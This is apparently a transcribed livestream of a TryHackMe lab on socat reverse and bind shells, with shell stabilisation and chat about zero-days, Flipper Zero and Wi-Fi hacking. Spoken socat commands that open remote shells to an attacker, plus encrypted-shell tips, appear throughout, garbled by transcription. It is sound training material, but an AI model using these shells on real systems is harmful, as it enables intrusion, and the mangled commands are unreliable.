would make so much more money. Nope, not working. I don't know what to do like in this case. Why it's not working? This time it should be working. Socat is there. LS Socat TCP LSPWD. Yes. Should I change the port maybe? maybe, yeah. Let's say 1111. Listen to this. One. Here bash CLI 222. Okay. So probably you can't see this, so I'll remove myself for a second. So that's what I'm trying to do. I don't know why it's not working. Okay, at least I'm not losing connection to this. Bandit, do you think I'm doing something wrong? Oh, maybe I can do is cancel this. TCP-L port, right? Attacker IP, blah blah blah. Here, bash li. Oh, I see. Okay, that's fine. Yeah, I don't understand though. Like, what can I be doing wrong? Port is 1111. One thing maybe could be if I do ps aux, look at all the processes and find something. Oh, this might not be there. Caption. Copy. Paste. Okay. Sorry, I didn't realize the caption thing is not there in the other one. My apologies, everyone. Let's see if I get a shelf quickly with this. Like, the worst part is I'm a premium paying member and still I'm going through this. Should I just started a different thing? Like, should I have created my own stuff? Okay, all good. What we'll do, I'll complete the other commands then. Till then, this is working. Okay. I'll go till here. Okay, quickly we'll cover. So with bind, we have this for this is for Linux, this is for Windows. Maybe I can start the Windows one, at least that might be working better. And wait. OBS. Okay. Righty. Okay, you guys can see me now, right? Okay. So I'm just going to ditch this part. Oh, there it is. TryHackme. Come on. Okay, shell is here. So ls or maybe cdtm/tmp ls socat is here, so I will do socat and the command quickly tcp and I will go 1 2 3 4 and here also I will be start listening to 1 2 3 4. I just want to try refused. Connection refuse. Oh, I have to press enter. Okay. So command is working. This one worked. Now I'm able to get ls, all the things, right? What I have to do, if you see, my arrows are not working. I'll remove myself for some time. Let's be easier. So here, my stuff is not working. My in the sense, my thing is not stable, right? One of the ways to stabilize this now is basically, as we went through last time, right? Python pty basically sudo terminal bin bash open that xterm control z and then bring it to foreground, background and then foreground. Pretty simple. Like, I will just move on because there's just a waste of time for everyone, right? So bind shell is a whole different game, because bind shell is, you're listening in. Earlier we were trying to do this. Now we have attacker machine, and this is target. Earlier we were listening on the attacker machine, right, and trying to do a connection from target. In this case we will be listening here, and listening comes first, then we try to attack it or create a connection. Yes, and as mentioned by Bendit, I was about to say as mentioned by Bindshell. As mentioned by Bendit, bind shells are not always a good idea because you are opening a port on victim's machine which can easily like get flagged, right? It can create a event on this system. And you always, like, even when you're getting a reverse shell, try to like do a shell that's kind of common but not in use. Same with bind too, I will say. Get flagged, allow others access, extra. Yeah, like basically allow other people access to the victim machine. So that's a good one. Actually, I didn't think of that part. Allow others access. So with the bind shell, right, I'll go here, bind shell. So with bind shell, first thing is do is listen on target machine. How we do that? Simple. Socat TCP-L, basically for listen, and port number execute bash li. Now, on Windows, you will do it different because, like, executing, you are using a PowerShell or a command shell, and pipes will basically make it like bash like stuff for you. Pipes is amazing. I think whoever thought of pipe deserves some kudos. Remember this one, right? Like here, pipes option is used to force PowerShell or command shell or command prompt to use Unix style standard input and output. Regardless of the target, we use this command on our attacking machine. So basically in this, we are saying TCP connection on this target and this port. Bendit, quick question, if you don't mind me asking, right? And this is for everyone watching. Have you ever used bind shell on an actual client? In any bind shell ever have you used during a client's hacking or assessment, I will say, when you're given assessment or assignment to a client? Not that I can recall. Oh, okay. Yeah, so it's like, even I think when we started this, TryHackme mentioned, right? It's like very few CTF challenges actually go through bind shell. Maybe way back in the day. Gotcha. And this is on attacker machine. I think this, I'm just writing it because like I think within an hour you will have this online on the GitHub. Let me drop the link before I forget for you guys. My GitHub will be up here. Penetration testing resources. Because I will be putting all these like early 2000s, before things were more strict. Okay, so like basically before even .com was popular, right? Before internet was popular, I will say. That's interesting. You have been like learning about shells like since then. That's like crazy. You have been learning shells almost same as my age, bro. But like I said, it's a very bad idea in general. Sometimes it's necessary for things like C2 agent to set up SOX proxies for pivoting, perhaps. Yeah. Haha, nice, nice. I love shells. I know you love shells. I know. If anybody don't understand what that reference is, Bendit is a very has contributed a lot in the Metasploit game, and Metasploit, a very big important tool, right? And it has a ASCII art. I love shells. So that's what he's referring to. I remember Bandit. I remember. So if you know, where is it? Where is it? Where is it? Where is it? So this guy, this is by Bandit. I love shells. So just to know how big this guy is, love this guy. Guy is like such a big thing. Still, he's like super humble. Is that how much Metasploit should we learn? I will say keep doing, bro. Like also the one above it, the white rabbit. Yeah, Metasploit, bro. Like I will tell you this. I learned Metasploit, right? Metasploit, you can like it's just certain steps you have to do, right? Once you do it, you're good to go. But there are a lot of things that keep on improving. Even you can contribute to it, right? One of the things I was doing last week was trying to create an exploit, contribute to it, so that the more you understand, the better it is for you. It's like a car, right? Metasploit or any other tool is like almost a car. Once you know how the car works in terms of engines, gears, and stuff, you can drift. You can make certain changes time to times to make it last long, right? So that's all. He is. He is. He is. This guy is like so. To give an idea of Bandit, and I think if you want, you can follow him. That's his. And it did zero. I think that's his handle on X or Twitter. This guy, I don't know. Like one of the things, the scariest things he has ever told me is like during one of his assignment, he was able to find something. I'm one only, bro. I'm. What is this? Sorry, I didn't get it. I am want only, bro. I didn't get that. But sorry, I didn't get that. Can you tell me exactly? But what I was saying, Bandit, this guy actually created, was able to find a issue in one of the things he was hacking that could lead to a whole explosion of a factory when he was doing assessment. Oh, okay. Oh, you are want. Oh, want. Oh, okay. You have to do codes. That sounds good. But yeah, man, Bandit is G. Like, I'll quickly show you his profile. David Root, this guy is Kaleji. Okay, I need to log in, but you guys get the idea. And I'll drop his link actually for you guys. So yeah, give this guy a follow. He did the interview with me, Delusion, episode 1. So asked him a bunch of questions. So, and we have this running. So let's see. Copy selection, paste. So this should be working now. No, I don't know what's working. I think it's just broke. All good. So on our attacker machine, we are doing this. Socat. What I will do, one thing I can do, just for some fun. I'll kill this machine and let's do a Windows machine so we can at least do some hacking. Windows practice box. And I will do x free administrator TryHackme. Same. Okay, this connection is closed, which is good, I guess now. So if anybody wants to understand, this is what we are doing. Okay. Oh, my bad. The machine is not up yet, I guess. Takes a couple of seconds. My bad. So we are going to yeah, I know. I get excited, man. Like, you know me. 0-day exploitation, bro. In simple terms, right? Let me explain. So let's say you created a. Let me show my face. Actually, that'll be nice. It's good to see myself sometimes. So let's say you created a application, right? Or let's say Google created an application. Yeah, I know. Can't do that. Those things during assessment. Yeah. If I want to hack CCTV, how do I? You guys, like, I don't. Okay, let me ask you guys one thing today. Who are you? Like, every single person today wants to do something illegal, or asking me to do how to do something illegal today. Why you guys want me to be go in jail? Like, why you want me? Yeah, making mistakes can be a problem indeed. So, first of all, happy soul, right? 0-day exploitation. Valentino, I will give you the answer too. So let's say you created Chrome application, right? And there is a way to hack. Let's say I want to hack something like through create a RCE, or there is an exploit. There is a problem vulnerability in it, right? And I was able to do an exploit in it. Remember, I was able to do it. So how many days it has passed that the developer of Chrome knew this? 0 days have passed because he don't know. So it's a 0 day exploit. 0 days have passed. You don't know. I know the exploit. Once you know, then the day starts 1, 2, and you basically have 90 days to come up with the fix. So Bandit said CCD is not necessarily illegal if it is camera they own. Yes, I agree. You can get into hardware hacking, pull the firmware, and check out the software installed. Yes, so Valentino, like the way Bandit said, there is this one, right? You can pull the system software and see what they're doing. To give you an idea of, because I worked in security alarm system sale when I was new. Bro, Kevin Midnight, like, okay, I'll first do this. So let's say CTV, right? A lot of them are basically connected to a Wi-Fi system of the house. So if you are able to access the Wi-Fi, you are able to like find. You can use the Wi-Fi hacking methods to get into this. There is something called, I think, I've seen some video of what's that thing? One second, I know the name of the tool. It's a duck similar, not rubber ducky. It's a Hack5. Is it on Hack5? Let me see. Products. Zipper, I think it's Zipper, something like that. Okay, Flipper. Flipper 0. There is this one you can use as well to look into hacking your the hardware part of it. Not five, yeah, like Wi-Fi pineapple to hack the Wi-Fi. Yes, Bandit. But Flipper 0, and there is some videos of people actually doing that because they did, if I'm not wrong, they did like garage doors and stuff. Flipper 0 CCTV. Shutting off security camera with Flipper 0, right? So there are these videos. I can drop a quick link here. Let's see. So that's at Walmart.
Use pin pad to complete transaction.
Now it's off. So they turned it off with Flipper 0. It's crazy. I'll just post this link. Because I know Flipper 0 is a big one. What is RF? What's RF Bandit? Sorry. And also, bro, Kevin Middack, also OG once upon a time. Then he changed like a good guy. Yeah, he was like one of the most radio frequency. Gotcha. Yes. And Kevin Middack, yeah, RIP to the legend. He was at one point, he was a curious kid. Like he was not even, yeah, he was a really curious guy, and rest in peace, right? And yeah, I remember one of his hearing, the judge said he was so dangerous that he can create nuclear war by just using a payphone. So it was interesting how big he was. Google Hack Docs live camera. Yeah. Google Hack Docs. I have adapter Wi-Fi OSIS 900 to use in mode injection. Oh, okay. That's crazy. I need to look into these things. I'm not the best with hardware, but I have to get into this. I have some Raspberry Pi. I created like some, basically a hacking lab at my home, just to learn during COVID time. Didn't have anything to do, right? So one thing to do here now. Let's go back to our hacking the Windows machine. So we have our here xvrdp. Oh, also, Bandit, you will be very happy to hear this. From tomorrow, we are using Tmux only. I watched the Hackersploit video. Good 14-minute one. Gave me a good review. So, yeah, finally. Man, this guy comes and roasts me every day. He waits for my stream to go online, I guess. Love this guy, man. Love this guy. Okay. So now we just need first is Socat. Oh no, we just doing, no, we need Socat anyways. So what we will be doing is with our Socat one, we'll do bind shell. So on Windows target, we'll use PowerShell. No, we'll use cmdxc, a command prompt, to do that with pipes, and then on our system we'll be doing this. So first we have to do the Socat on here. Get let's see, netshell stabilization. We get our Socat static library. Let's open Firefox. Should be working. Oh, it's a T3A small. That's not very powerful. If you want to know what T3A small is, that's AWS Cloud. That's the ID. I don't know if it's a good thing to put that ID out there or no. Europe West 1LB. And this takes forever. Okay, Firefox is on. I think I can go in cloud a lot because I have really good experience with cloud and I love cloud. Anybody here has done cloud? Bandit, have you done cloud hacking? Anyone else has done that? Oh, the connection got closed. Great. Nice. How is cloud hacking, bro? Everything is dropping today. I don't know why this system is. What is that? It's not really much different from web app or on-prem stuff. Just a lot of web app focus. Yeah, but I think like, or maybe I was just thinking in a different way because like shell is still like, sorry, cloud is still like, I feel a lot of misconfiguration happens on cloud more than prem. For some reason, I feel like that way. But especially with the Google dorking, for people who don't know, right? Bro, other than TryHackme and Hackdaw, is there any other YouTube offline content like course to learn hacking from? Yes, bunch. There are bunch. Let's say first will be OWAPs, right? Let me drop the whole list. OWAPs, HackerOne is big, Bugcrowd, all these places you will find, let's say, resources, because the more you find integrity, I think there's this one. These guys, because the more you find, they will make money, right? You are doing live. After you go offline, I'll go learn offline also. Yeah, 100%. And just message in Discord if you need any help. We got you, right? There's a good community. Anybody who wants to join. There is Integrity, OWAPs, HackerOne. OneHub is a good one. Oh, offline content. OneHub is a good one then. OneHub is a good one because you can just download it and start hacking. On HackerOne, there is a book. Let me share that. Ebook. I think once you create a beyond penetration for web tech. No. There is a book I can't find. I will put the link later, I guess. But they have this book, Hacker 101 for Hackers. They have this book which is which has a lot of bounties that were reported very highly. And like they made like 25K, single bounty made like around $25,000. This one, Web Hacking 101. Read this book. I read through like a couple of years ago, loved it. And you can get it for free. You're a student, right? So just get it for free on a ebook version of this.
Jody Bobby.
You'll get an ebook version of this. No, just a look. Actually, like you will get the whole full book. Oh, you meant instead of look, I think you meant book, right? So yeah, just read through these. Offline will be OneHub. Oh. Vulnerable by design. Download them, create a virtual machine, hack them. Basically. More offline. Offline is hard. I think YouTube is big. These guys, yeah, just YouTube and all these guys are pretty good and stuff. See before comment. One sec. Oh. Oh, offline content. Yeah, I see. But yeah, collection of enriched with helpful comments. Yeah. Yep. But this will give you, I will say, this book I really like because it gave me an idea of what to expect as a bug bounty hunter. That's for sure. Because this one, as I mentioned, right, this is not a book about like teaching you all the tricks, but this is about like, okay, these were the vulnerabilities found, right? This is how people did it, this is what they reported, and just an idea of what people do. YouTube recorded videos, sure, that's a good. what I can do, okay, so that will go for long. What I will do, I'll create a playlist for you and I will share it. So let's say you go on my, let's say, name, right, on YouTube. You will be able to see, like, I think in the playlist, you will be able to see in my playlist. I'll do that for you. I'll create like a playlist of just public one this time, which I'll just share all those things. Will that work? Will that be a better one? Because I don't want to give you 20 names. Yeah, I'll do that, bro. I'll do that for you. I think that will be easy and that will be great, and people can add suggestions to it. So that'll be, Bendit can add his suggestions too. So that'll be amazing. I would love to know what this guy thinks. Okay, state running, quit session. So I think this won't be working anymore here. This machine. Yeah, lads. So I think what I can say is today we didn't get to hack as much because the system is not working. I will report this. Hopefully tomorrow things are working fine. I'm going to go into TryHackme. Oh, also, I'll share you a whole list. I'll share you a whole list of things you should do. And yeah, this one we did last time on, I think, Friday. We did this, in which we create a certificate, create a PEM file from it, Socat that, so it's SSL, and nobody can see our connection, what we are trying to do. So I think that's pretty much it from my side today, because things are not working, can't do much. Go to I'll push the content on GitHub, if not tonight, before tomorrow's stream. And from tomorrow, for intro to shells, we will work on common shell payloads and learn about what this is. No, you didn't, bro. You didn't. Don't say that. Do not say that. Like, how, no, it wasn't you, because, like, think about this. I'm not able to get the shell back. I'm not able to get Windows, this AWS thing working from TryHackme. It is not you. It's not you. Trust me. And do not worry about this one. Trust me. Because you are asking questions, my stream went longer. I was more happier. So please keep asking questions, keep talking. It helps me as a streamer. Trust me, like, I cannot express how important it is when somebody just says, "Hey, how's going?" Like, I can't express. It's a very beautiful thing. It's a very, very beautiful thing. And I thank you for messaging. Like Bandit, thanks for Benedict, right? Thanks to you, Want, right? Thanks to Valentino. Happy soul again, you are one, right? I'm doing good, man. I'm happy. See, that's what I like, and that's how you build connection. Thanks to Game Boy, right? Everyone here, like, it's amazing. It's amazing to have the guys. Bandit is OG. He is. This is the guy. This guy. One thing I said while during his interview, and this is I always stand by. This guy doesn't have a resume card. He has a second account, bro. Yeah. And with Bennett, I say he doesn't have a resume. He has a menu card. The guy's just crazy in his knowledge and his stuff. Amazing guy. So yeah, I guess that's all. Here you can read the. Oh, Valentino is about to drop the link, I believe. Thanks, man. Can you even post on the Discord, actually, if possible? Oh yeah, you get the email link, right? Yeah, now I remember. It's been so long. Can you post in Discord? That'll be great. And a lot of time, lads, you can just message me directly in Discord. I would love that. Hey, we got Want and Valentino. Sir. So yeah, we'll drop some resources. We don't take the take offer. He gives. Yeah, he does. He is the OG. But yeah, thank you everyone for joining, right? And yeah, bless you all. Like I don't know, I'm just very happy. I got so many people today, so many messages. I'm just happy. Thank you. And yeah, this means a lot. Every single message you guys do means a lot. From my to-do list though will be, I'll get you the YouTube playlist, what I learned. I'll get you some other resources which I really like and helps me go through this, which are offline, non-paying, paying, and stuff. Right. So yeah, that's all, everybody. Thank you so much. Want me? Sounds good. Yeah, I could tell actually with the want. Yeah. Yeah, what is the want story? You have to tell in the Discord. That'll be nice. But yeah, thank you, everybody. I have to go have my dinner. It's 9:30. Right, I have work at 8. But thank you so much. Hope you have a great night. Keep sharing, keep messaging in this place. It helps me a lot. And like usual, as I say, 1, 2, 3, bye. Thank you, everyone. Have a good night. Love you all. Bye.